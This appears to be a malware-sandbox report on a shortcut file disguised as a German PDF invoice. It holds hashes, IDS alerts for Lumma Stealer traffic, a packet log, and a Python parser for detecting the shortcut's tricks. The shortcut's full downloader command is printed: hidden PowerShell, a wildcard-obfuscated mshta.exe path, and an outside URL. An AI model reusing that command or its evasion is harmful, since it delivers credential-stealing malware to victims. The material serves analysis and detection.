                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:t.pY...EkoJ..bkg..N.v...]tP..PI..\sN.LOe.Jegth.u.GD][EB..V.Rj...`.P...k....ksJBfdYdf_....fQ......U....g..u.lDaC.O..R.G.QFE_.J.L.h..r.qw.e.`G..X..Rj.CZc...Ll....E..d[..M.......i..._..eH.F..w.Gi.WN.JPp.B.GVP.....XU.Jna..IPb.....\s.lyx.v.....rHG.W.]...GKry...rf...g.^LJK...w....XyX.k...v.aaw._..Gw...EL........YYrTD.JNRb.qvm...s..y..f..H.....DtO.e...K.......WK.p.L.YIMbjL....D.....\Idg...H....Z^.pj.H...ncj...f...[X..I.dx..x.EV...f..`.e.KW.....fWU`....L.w.xr...Fwx..Y.co.U..p..b.tdX.....].n...l.Q....X..XO.....uii.A..D....f.l..ddHJ.RRiP..E.WX.s..c..sX..r......D..u.U.o.\W.D.PU.njyMw.sC.JJbJ...C.C...B.....c.A.P..N..l_..kO\..Hj.....dIxjt..K..^]Nfv...Gn.e.....Q...RvHje.R].s.Ts.uQ\ep^.Bq..d.......n..oF.Nq...`.h...f.q[qnqM.pE.V.......e.S.u.].TqW.A..]m..y.G..e.VP..RU.`b.Jr..ki^.w[lI.uy...Ya..W..[y..My..FI^no.nC.....a...j.uF.X...q.Jt^.E.N.PWb.gCu.]..IEBQOSeKXB^..e...XE.f..`vlL..s.Rv......jcgvg.L..CT....S....d.B[tMWx..V...iYa.....o.w`...T..j.O.D...^..L..OtvR.W.....E.v`.P.Pv.OR.p.....D^BYL._.yE^..B.tf..q
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):1909504
                                                                                                                                                                                                                                              Entropy (8bit):6.730805689885005
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:49152:GpjwrP6yVgBd39sUUzFti4aTotmIT3SxLmNKbx:GpjwrP6yKTOUmi4aTo1NK9
                                                                                                                                                                                                                                              MD5:098AC4621EE0E855E0710710736C2955
                                                                                                                                                                                                                                              SHA1:CE7B88657C3449D5D05591314AAA43BD3E32BDAA
                                                                                                                                                                                                                                              SHA-256:46AFBF1CBD2E1B5E108C133D4079FADDC7347231B0C48566FD967A3070745E7F
                                                                                                                                                                                                                                              SHA-512:3042785B81BD18B641F0A2B5D8AEC8EF86F9BF1269421FB96D1DB35A913E744EAFF16D9DA7A02C8001435D59BEFB9F26BC0BBFA6E794811ABF4282ED68B185FE
                                                                                                                                                                                                                                              Malicious:true
                                                                                                                                                                                                                                              Yara Hits:
                                                                                                                                                                                                                                              • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\iScrPaint.exe, Author: Joe Security
                                                                                                                                                                                                                                              Antivirus:
                                                                                                                                                                                                                                              • Antivirus: ReversingLabs, Detection: 3%
                                                                                                                                                                                                                                              Preview:MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L...s..d..................................... ....@...........................!..................@......................P....@...F......8................;......8"...................................................L...............................text............................... ..`.itext..P........................... ..`.data........ ......................@....bss.....g...............................idata...F...@...H..................@....edata..P...........................@..@.tls....L................................rdata..............................@..@.reloc..8".......$..................@..B.rsrc...8............*..............@..@....................."..............@..@........................................................
                                                                                                                                                                                                                                              Process:C:\Users\user\AppData\Roaming\TCUINOVJ.exe
                                                                                                                                                                                                                                              File Type:data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):64950
                                                                                                                                                                                                                                              Entropy (8bit):4.515083558964412
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:1536:RkNN3WO3yFEA8KV587xJxRaMv7+NHE8qsK4pezGNxzOW/Ro:0ZWO3yFEA8ECRRv7uk8qsK4kzGN9OWu
                                                                                                                                                                                                                                              MD5:DB9F61246773A0BA48516A9549603B06
                                                                                                                                                                                                                                              SHA1:6CB9FF25201C920D61FF861A687DC7FA1D321C18
                                                                                                                                                                                                                                              SHA-256:6B6D7477963EA3AA4028878716A918A3028D6452F1AB1CBF92B4F073FE81F973
                                                                                                                                                                                                                                              SHA-512:79AC6DEE0EB3B3F210230481695D6E7324018A329871F0A32D02480A7CECC4F31353C32A5B14E6E686288AB2E0AA5CCFA9103C89E212DB79591F06491FF7E0AB
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:.vYZ...x[T.F.g\W.[...W..`.p.....Ha..ll.yP[`D.......Y.Iw.^pg.K.q.e..l.B...aR.......Y.l.U...c^x....vLm..ixf_Qm.J`A.y.rF......yT.LqSiEaaL`..A.L..UQ..o....q[..\yeWDv.....EXf^..........T.p..XZ..JlS..wLXSl...EU..i].....n......AFs.UN^[.w.]...ME.FfT..W...BO.].ul....BH...V....p..\._uy.B..w...M.srg..r.LU.XC.....^..`..w..Q.O....ARR.FX..Vk.OCp]....r.CQC.].M.j...JB...P.XI..`Gu`.iq....HY.xai.....jh.M.TfG.it.rm..^L_W..E..cU.B.hI.i.`i..qY[.CTGom.O.AUZ.TB.....r....k.Lm.....w.u..D.g.d..Sj.nK.bb...RN.SF..SR.w.VZ..p.m..OvKlL.N.qOIe...^._`..y...FGdq......q.s.p]Y.o.IM.s.Y....qEXTi.Q.gX.e...\N..F.m.H.w.mv.`.lm.].n[b.VmmT.FH.C.h..rhf[..rwr.DYg_..SN..L...Q..l....s..h..W..HSkgK..S..l..xn.FcL...n.Oi^gE...m.Q.....e..^jf.f.I...xMd.i..^kJfT`ERdiW..X.....n].t..i.d`.....uE...k...w.Aw.h.l..C..`eap.....`A_......ZpI...mX.h.biq.xjy.g...Dgo.Ta....p.EY....JYD..e.O.w...aKX...qrXUh.BG_..i.CvSUl.c.q...w......Sg..DI..qC.c..]Ym\].P..I....T..bhl\.o.[D..G..KP...\.........SI[.r.Sf.....hL..dx]acI.GE..\BTACV.].PQhe.P.....DPuvs..r.df
                                                                                                                                                                                                                                              Process:C:\Windows\System32\svchost.exe
                                                                                                                                                                                                                                              File Type:JSON data
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):55
                                                                                                                                                                                                                                              Entropy (8bit):4.306461250274409
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YDQRWu83XfAw2fHbY:YMRl83Xt2f7Y
                                                                                                                                                                                                                                              MD5:DCA83F08D448911A14C22EBCACC5AD57
                                                                                                                                                                                                                                              SHA1:91270525521B7FE0D986DB19747F47D34B6318AD
                                                                                                                                                                                                                                              SHA-256:2B4B2D4A06044AD0BD2AE3287CFCBECD90B959FEB2F503AC258D7C0A235D6FE9
                                                                                                                                                                                                                                              SHA-512:96F3A02DC4AE302A30A376FC7082002065C7A35ECB74573DE66254EFD701E8FD9E9D867A2C8ABEB4C482738291B715D4965A0D2412663FDF1EE6CBC0BA9FBACA
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:{"fontSetUri":"fontset-2017-04.json","baseUri":"fonts"}
                                                                                                                                                                                                                                              Process:C:\Windows\System32\wbem\WMIC.exe
                                                                                                                                                                                                                                              File Type:ASCII text, with CRLF, CR line terminators
                                                                                                                                                                                                                                              Category:dropped
                                                                                                                                                                                                                                              Size (bytes):160
                                                                                                                                                                                                                                              Entropy (8bit):5.095703110114614
                                                                                                                                                                                                                                              Encrypted:false
                                                                                                                                                                                                                                              SSDEEP:3:YwM2FgCKGWMRX1eRHXWXKSovrj4WA3iygK5k3koZ3Pveys1MgmJPFJQAiveyzowv:Yw7gJGWMXJXKSOdYiygKkXe/egmXeAin
                                                                                                                                                                                                                                              MD5:3E0D6A9EFD1FCFFDEDADE0FE4D1D1085
                                                                                                                                                                                                                                              SHA1:31714089B8B78B362799E49E62D18013F776B427
                                                                                                                                                                                                                                              SHA-256:31AEEC0E0C83EAEF0DC9EDD97D8B6A078669BBAF722834DC2E310D54E31A77D6
                                                                                                                                                                                                                                              SHA-512:BE08D7F42D5E6DCABAEB9DE700FEFC9A772399B6C6BA7E69446509B4BEC54F2DC7CCDC6EAC08DA7F0BF397DC3E46A5CD28640C3221804F69D86092524090A1E1
                                                                                                                                                                                                                                              Malicious:false
                                                                                                                                                                                                                                              Preview:Executing (Win32_Process)->Create()...Method execution successful....Out Parameters:..instance of __PARAMETERS..{...ProcessId = 4592;...ReturnValue = 0;..};....
                                                                                                                                                                                                                                              File type:MS Windows shortcut, Item id list present, Has Relative path, Has command line arguments, Icon number=11, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hidenormalshowminimized
                                                                                                                                                                                                                                              Entropy (8bit):2.568206802442521
                                                                                                                                                                                                                                              TrID:
                                                                                                                                                                                                                                              • Windows Shortcut (20020/1) 100.00%
                                                                                                                                                                                                                                              File name:Rechnung736258.pdf.lnk
                                                                                                                                                                                                                                              File size:1'899 bytes
                                                                                                                                                                                                                                              MD5:5bfe0ada17542af48b71b2bd2861b738
                                                                                                                                                                                                                                              SHA1:2a4a858db4aff6ba8d9da7b104cec8e45fb426a8
                                                                                                                                                                                                                                              SHA256:021feed3c450c435bdbd4167f81f4917fcecf38e1836e9bff3c32e0063f3baf5
                                                                                                                                                                                                                                              SHA512:3329cef8595d5a6153a353ba932058d9ab3108c6462025709be661749588b8b93ea5bb96ccc8b51e832d151812f42ec1a985bc9b86ece88747d59b45e1bb27d0
                                                                                                                                                                                                                                              SSDEEP:24:8AyH/BUlgKN4e0+/3dkWNBvLG3zqdd79dsHLIQ:89uGeTdlBzG3mdJ9
                                                                                                                                                                                                                                              TLSH:F04104186AF91B10F3F68E32587AB721CA7B7C4AED628F1D018146CD2425A10BD75F6B
                                                                                                                                                                                                                                              File Content Preview:L..................F.@...........................................................P.O. .:i.....+00.../C:\...................V.1...........Windows.@.............................................W.i.n.d.o.w.s.....Z.1...........System32..B.....................
                                                                                                                                                                                                                                              Icon Hash:72d282828e8d8dd5

                                                                                                                                                                                                                                              General

Relative Path:..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe
Command Line Argument:process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"
Note:"process call create" is WMIC's Win32_Process.Create (compare the WMIC output file dropped above), so PowerShell is created by the WMI provider host (WmiPrvSE.exe) rather than by explorer.exe or wmic.exe. "-w 1" is -WindowStyle Hidden. The wildcard path "\W*\S*2\m*ht*e" is resolved by PowerShell's dot-source operator to C:\Windows\System32\mshta.exe, so the string "mshta" never appears in the shortcut itself; mshta.exe then runs whatever script the URL serves (see the "Suspicious MSHTA Child Process" Sigma hit).
Icon location:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
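The two shortcut fields above are all a triage analyst needs to reconstruct the launch chain, and both can be pulled straight from the .lnk bytes. The following is an added example, not Joe Sandbox code: a minimal MS-SHLLINK parser that reads the header and StringData (LinkInfo and ExtraData are skipped), a resolver that expands a wildcard path the way PowerShell's & and . operators do, and a triage routine that flags the WMI launcher, the hidden window and the obfuscated mshta.exe path. The relative path, arguments and icon location are the values reported above; the .lnk bytes (built by build_lnk) and the directory tree are constructed stand-ins for a real sample and a real C: drive.

```python
import fnmatch
import re
import struct

# MS-SHLLINK: HeaderSize 0x4C, LinkCLSID {00021401-0000-0000-C000-000000000046}, LinkFlags bits
LNK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_ID_LIST, HAS_LINK_INFO, HAS_NAME, HAS_REL_PATH = 0x01, 0x02, 0x04, 0x08
HAS_WORK_DIR, HAS_ARGS, HAS_ICON, IS_UNICODE = 0x10, 0x20, 0x40, 0x80
STRING_FIELDS = ((HAS_NAME, "name"), (HAS_REL_PATH, "relative_path"),
                 (HAS_WORK_DIR, "working_dir"), (HAS_ARGS, "arguments"), (HAS_ICON, "icon_location"))
WILDCARD_PATH = re.compile(r'\\[^\s"\']*\*[^\s"\']*')   # a backslash path containing a '*'


def parse_lnk(data: bytes) -> dict:
    """Parse ShellLinkHeader + StringData of a .lnk blob; LinkInfo and ExtraData are skipped."""
    if len(data) < 0x4C or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LNK_CLSID:
        raise ValueError("not a ShellLink file")
    flags = struct.unpack_from("<I", data, 0x14)[0]
    icon_index, show_command = struct.unpack_from("<iI", data, 0x38)
    off = 0x4C
    if flags & HAS_ID_LIST:            # LinkTargetIDList: u16 IDListSize followed by the IDList
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINK_INFO:          # LinkInfo: u32 LinkInfoSize that includes itself
        off += struct.unpack_from("<I", data, off)[0]
    out = {"flags": flags, "icon_index": icon_index, "show_command": show_command}
    for bit, key in STRING_FIELDS:     # StringData entries are present in this fixed order
        if not flags & bit:
            continue
        count = struct.unpack_from("<H", data, off)[0]
        width = 2 if flags & IS_UNICODE else 1
        raw = data[off + 2:off + 2 + count * width]
        out[key] = raw.decode("utf-16-le" if width == 2 else "cp1252")
        off += 2 + count * width
    return out


def build_lnk(rel_path: str, args: str, icon: str, icon_index: int = 11, show: int = 7) -> bytes:
    """Assemble a minimal unicode .lnk (one dummy ItemID); used here only to construct test input."""
    flags = HAS_ID_LIST | HAS_REL_PATH | HAS_ARGS | HAS_ICON | IS_UNICODE
    header = struct.pack("<I16sIIqqqIiIHHII", 0x4C, LNK_CLSID, flags, 0, 0, 0, 0, 0,
                         icon_index, show, 0, 0, 0, 0)
    idlist = struct.pack("<HH", 6, 4) + b"\x1f\x50" + b"\x00\x00"   # IDListSize, ItemID, terminator

    def sd(s: str) -> bytes:
        return struct.pack("<H", len(s)) + s.encode("utf-16-le")

    return header + idlist + sd(rel_path) + sd(args) + sd(icon)


def expand_wildcard_path(pattern: str, tree: dict, drive: str = "C:") -> list:
    """Expand a drive-rooted wildcard path segment by segment (case-insensitive, files only),
    mimicking how PowerShell's & and . operators resolve a command path such as \\W*\\S*2\\m*ht*e."""
    matches = [(drive, tree)]
    for part in [p for p in pattern.split("\\") if p]:
        nxt = []
        for prefix, node in matches:
            for name, child in (node or {}).items():
                if fnmatch.fnmatchcase(name.lower(), part.lower()):
                    nxt.append((prefix + "\\" + name, child))
        matches = nxt
    return sorted(path for path, child in matches if child is None)


def triage_lnk(parsed: dict, tree: dict) -> list:
    """Findings for the launcher tricks in this sample: WMI process creation, hidden window,
    wildcard-obfuscated binary path, and an icon borrowed from another application."""
    findings = []
    target, args = parsed.get("relative_path", "").lower(), parsed.get("arguments", "")
    if target.endswith("\\wmic.exe") and "process call create" in args.lower():
        findings.append("target is wmic.exe 'process call create': child is spawned via "
                        "Win32_Process.Create, so its parent is WmiPrvSE.exe, not explorer.exe")
    if re.search(r"(?i)\bpowershell\b.*\s-w(indowstyle)?\s+(1|hidden)\b", args):
        findings.append("PowerShell started with -WindowStyle Hidden (-w 1)")
    for token in WILDCARD_PATH.findall(args):
        for path in expand_wildcard_path(token, tree):
            findings.append("wildcard path " + token + " resolves to " + path)
    icon = parsed.get("icon_location", "")
    if icon and icon.lower().rsplit("\\", 1)[-1] != target.rsplit("\\", 1)[-1]:
        findings.append("icon borrowed from " + icon + " while the target is " + parsed["relative_path"])
    return findings


# Sample input: relative path, arguments and icon location are the values reported above;
# the .lnk bytes and the directory tree (None marks a file) are constructed for this example.
SAMPLE_REL_PATH = r"..\..\..\..\..\..\Windows\System32\Wbem\wmic.exe"
SAMPLE_ARGS = r'process call create "powershell -w 1 . \W*\S*2\m*ht*e https://dimitricostruzioni.ch/documentcomplie"'
SAMPLE_ICON = r"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe"
SAMPLE_LNK = build_lnk(SAMPLE_REL_PATH, SAMPLE_ARGS, SAMPLE_ICON)
SAMPLE_TREE = {
    "Windows": {"System32": {"mshta.exe": None, "msiexec.exe": None, "mshtml.dll": None,
                             "Wbem": {"WMIC.exe": None}},
                "SysWOW64": {"mshta.exe": None}},
    "Users": {}, "Program Files": {},
}

if __name__ == "__main__":
    info = parse_lnk(SAMPLE_LNK)
    print(info)
    for finding in triage_lnk(info, SAMPLE_TREE):
        print("-", finding)
```

The resolver returns every file that matches, so a detection built on it should alert on the pattern itself (a command path containing `*`) rather than only on the resolved name: the same trick works for any LOLBin whose name the attacker can spell with wildcards.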
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-12-21T14:59:11.549244+0100 | 2803305 | ETPRO MALWARE Common Downloader Header Pattern H | 3 | 192.168.2.5 | 49710 | 62.182.21.105 | 443 | TCP
2024-12-21T14:59:52.458854+0100 | 2058308 | ET MALWARE Win32/Lumma Stealer Related CnC Domain in DNS Lookup (securesways .click) | 1 | 192.168.2.5 | 55295 | 1.1.1.1 | 53 | UDP
2024-12-21T14:59:54.022416+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:54.022416+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:56.939866+0100 | 2049836 | ET MALWARE Lumma Stealer Related Activity | 1 | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:56.939866+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49803 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:58.175252+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:58.175252+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:59.025544+0100 | 2049812 | ET MALWARE Lumma Stealer Related Activity M2 | 1 | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T14:59:59.025544+0100 | 2054653 | ET MALWARE Lumma Stealer CnC Host Checkin | 1 | 192.168.2.5 | 49815 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:00.799468+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49821 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:00.799468+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49821 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:03.593870+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49832 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:03.593870+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49832 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:06.068835+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49838 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:06.068835+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49838 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:11.085708+0100 | 2058309 | ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI) | 1 | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | TCP
2024-12-21T15:00:11.085708+0100 | 2028371 | ET JA3 Hash - Possible Malware - Fake Firefox Font Update | 3 | 192.168.2.5 | 49849 | 104.21.16.1 | 443 | TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:12.280466+01002048094ET MALWARE [ANY.RUN] Win32/Lumma Stealer Exfiltration1192.168.2.549849104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:13.970949+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549855104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:13.970949+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549855104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:18.946471+01002058309ET MALWARE Observed Win32/Lumma Stealer Related Domain (securesways .click in TLS SNI)1192.168.2.549871104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:18.946471+01002028371ET JA3 Hash - Possible Malware - Fake Firefox Font Update3192.168.2.549871104.21.16.1443TCP
                                                                                                                                                                                                                                              2024-12-21T15:00:19.811654+01002054653ET MALWARE Lumma Stealer CnC Host Checkin1192.168.2.549871104.21.16.1443TCP
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Dec 21, 2024 14:59:01.388335943 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:01.388458014 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:01.388571024 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:01.398253918 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:01.398293018 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:02.795172930 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:02.795248032 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.225085020 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.225148916 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.226263046 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.226331949 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.228986979 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.275378942 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.628422022 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.629394054 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.752717972 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.752749920 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.752798080 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.752842903 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.752899885 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.752938032 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.752960920 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.865992069 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.866065979 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.866079092 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.866122961 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.866168022 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.866168022 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.917057037 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.917102098 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.917174101 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.917211056 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:03.917241096 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:03.917303085 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.042586088 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.042634010 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.042696953 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.042742014 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.042773962 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.042792082 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.072060108 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.072104931 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.072145939 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.072175026 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.072221994 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.072222948 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.092451096 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.092495918 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.092545033 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.092575073 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.092602968 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.092623949 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.395343065 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.395381927 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.395452976 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.395908117 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.395992041 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.424041986 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.424120903 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.424144983 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.424184084 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.424242973 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.424264908 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.450618029 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.450668097 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.450723886 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.450742006 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.450771093 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.450790882 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.476059914 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.476106882 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.476140022 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.476159096 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.476193905 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.476383924 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.500484943 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.500560045 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.500566959 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.500588894 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.500622034 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.500660896 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.528731108 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.528779984 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
Dec 21, 2024 14:59:04.528810024 CET | 49704 | 443 | 192.168.2.5 | 62.182.21.105
Dec 21, 2024 14:59:04.528825045 CET | 443 | 49704 | 62.182.21.105 | 192.168.2.5
